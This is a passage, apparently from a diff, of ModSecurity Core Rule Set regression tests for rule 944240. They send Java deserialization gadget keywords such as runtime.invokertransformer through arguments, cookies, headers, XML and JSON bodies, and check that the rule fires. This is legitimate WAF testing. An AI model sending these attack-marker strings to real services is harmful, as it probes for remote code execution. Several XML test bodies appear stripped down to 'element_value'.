"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-5 + desc: "XML attribute value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-6 + desc: "XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-7 + desc: "Nested XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-8 + desc: "Content-Type text/plain includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-9 + desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-10 + desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-11 + desc: "Argument test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-12 + desc: "Argument name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-13 + desc: "Cookie test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-14 + desc: "Cookie name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-15 + desc: "Request header test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-16 + desc: "XML attribute value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-17 + desc: "XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-18 + desc: "Nested XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-19 + desc: "Content-Type text/plain includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-20 + desc: "Content-Type application/json arg value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-21 + desc: "Content-Type application/json arg name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-22 + desc: "Argument test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-23 + desc: "Argument name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-24 + desc: "Cookie test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-25 + desc: "Cookie name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-26 + desc: "Request header test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-27 + desc: "XML attribute value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-28 + desc: "XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-29 + desc: "Nested XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-30 + desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-31 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-32 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-33 + desc: "Argument test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-34 + desc: "Argument name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-35 + desc: "Cookie test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-36 + desc: "Cookie name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-37 + desc: "Request header test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-38 + desc: "XML attribute value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-39 + desc: "XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-40 + desc: "Nested XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-41 + desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-42 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-43 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-44 + desc: "Argument test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-45 + desc: "Argument name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-46 + desc: "Cookie test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-47 + desc: "Cookie name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-48 + desc: "Request header test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-49 + desc: "XML attribute value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-50 + desc: "XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: 